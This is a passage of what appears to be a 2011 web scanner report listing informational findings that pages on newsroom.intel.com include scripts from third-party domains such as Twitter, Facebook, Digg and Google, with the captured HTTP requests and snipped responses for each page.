Issue detail

The response dynamically includes the following script from another domain:
  • http://platform.twitter.com/widgets.js

Request

GET /community/intel_newsroom/free_press/ HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:17 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313934363b33382c313936333b33382c313935393b33382c313936303b33382c313931393b33382c313538363b31342c323032353b31342c323031363b; Expires=Mon, 07-Mar-2011 23:14:19 GMT; Path=/
X-JAL: 81
Content-Language: en-US
CacheHit: D=107940 t=1296947657290454
X-JSL: D=107945 t=1296947657290454
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
<!-- need on homepage for Tw Like -->
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

18.74. http://newsroom.intel.com/community/pt_br  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/pt_br

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://twitter.com/javascripts/blogger.js
  • http://twitter.com/statuses/user_timeline/intelbrasil.json?callback=twitterCallback2&count=3
  • http://twitter.com/statuses/user_timeline/intelbrasil.json?callback=twitterCallback2&count=5
  • http://widgets.digg.com/buttons.js
  • http://www.antecipandooamanha.com.br/js/blogger.js
  • http://www.google.com/buzz/api/button.js

Request

GET /community/pt_br HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:39 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313538363b33382c313931393b33382c313936303b33382c313935393b33382c313934363b33382c313936333b31342c323032373b31342c323031363b31342c323030343b31342c323031303b31342c323030353b31342c323030363b31342c323030373b31342c323031313b31342c323032353b; Expires=Mon, 07-Mar-2011 23:14:42 GMT; Path=/
X-JAL: 573
Content-Language: en-US
CacheHit: D=662753 t=1296947679796756
X-JSL: D=662759 t=1296947679796756
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</div><script src="http://twitter.com/javascripts/blogger.js" type="text/javascript"></script><script src="http://twitter.com/statuses/user_timeline/intelbrasil.json?callback=twitterCallback2&amp;count=5" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://www.antecipandooamanha.com.br/js/blogger.js" type="text/javascript"></script><script src="http://twitter.com/statuses/user_timeline/intelbrasil.json?callback=twitterCallback2&amp;count=3" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.75. http://newsroom.intel.com/docs/DOC-1405  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /docs/DOC-1405

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /docs/DOC-1405 HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:14 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c323037373b332c323137373b332c333031313b332c323137393b3130322c313430353b3130322c313430363b3130322c313830313b33382c313931393b33382c313936303b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323031363b31342c323032373b31342c323031303b31342c323030363b31342c323030373b31342c323031313b31342c323030343b31342c323030353b31342c323032353b; Expires=Mon, 07-Mar-2011 23:15:16 GMT; Path=/
X-JAL: 137
Content-Language: en-US
CacheHit: D=145435 t=1296947714874736
X-JSL: D=145441 t=1296947714874736
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.76. http://newsroom.intel.com/docs/DOC-1406  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /docs/DOC-1406

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /docs/DOC-1406 HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:16 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c323137373b332c323137393b332c323037373b332c333031313b3130322c313430363b3130322c313830313b3130322c313430353b33382c313931393b33382c313936303b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323031363b31342c323032373b31342c323031303b31342c323030363b31342c323030373b31342c323031313b31342c323030343b31342c323030353b31342c323032353b; Expires=Mon, 07-Mar-2011 23:15:17 GMT; Path=/
X-JAL: 132
Content-Language: en-US
CacheHit: D=230475 t=1296947716041062
X-JSL: D=230480 t=1296947716041062
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.77. http://newsroom.intel.com/docs/DOC-1502  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /docs/DOC-1502

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /docs/DOC-1502 HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:24 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137373b332c323037373b332c323137393b3130322c313530323b3130322c313430353b3130322c313830313b3130322c313430363b33382c313931393b33382c313936303b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323031363b31342c323032373b31342c323031303b31342c323030363b31342c323030373b31342c323031313b31342c323030343b31342c323030353b31342c323032353b; Expires=Mon, 07-Mar-2011 23:15:26 GMT; Path=/
X-JAL: 88
Content-Language: en-US
CacheHit: D=105071 t=1296947724957894
X-JSL: D=105076 t=1296947724957894
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.78. http://newsroom.intel.com/docs/DOC-1512  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /docs/DOC-1512

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /docs/DOC-1512 HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:33 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b332c323037373b3130322c313531323b3130322c313530323b3130322c313634313b3130322c313430363b3130322c313430353b3130322c313830313b33382c313931393b33382c313936303b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323031363b31342c323032373b31342c323031303b31342c323030363b31342c323030373b31342c323031313b31342c323030343b31342c323030353b31342c323032353b; Expires=Mon, 07-Mar-2011 23:15:35 GMT; Path=/
X-JAL: 291
Content-Language: en-US
CacheHit: D=300088 t=1296947733483012
X-JSL: D=300094 t=1296947733483012
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.79. http://newsroom.intel.com/docs/DOC-1641  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /docs/DOC-1641

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /docs/DOC-1641 HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:25 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137373b332c323137393b332c323037373b3130322c313634313b3130322c313830313b3130322c313430363b3130322c313530323b3130322c313430353b33382c313931393b33382c313936303b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323032373b31342c323031363b31342c323031303b31342c323030363b31342c323030373b31342c323031313b31342c323030343b31342c323030353b31342c323032353b; Expires=Mon, 07-Mar-2011 23:15:27 GMT; Path=/
X-JAL: 86
Content-Language: en-US
CacheHit: D=94366 t=1296947725779156
X-JSL: D=94371 t=1296947725779156
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.80. http://newsroom.intel.com/docs/DOC-1801  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /docs/DOC-1801

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /docs/DOC-1801 HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
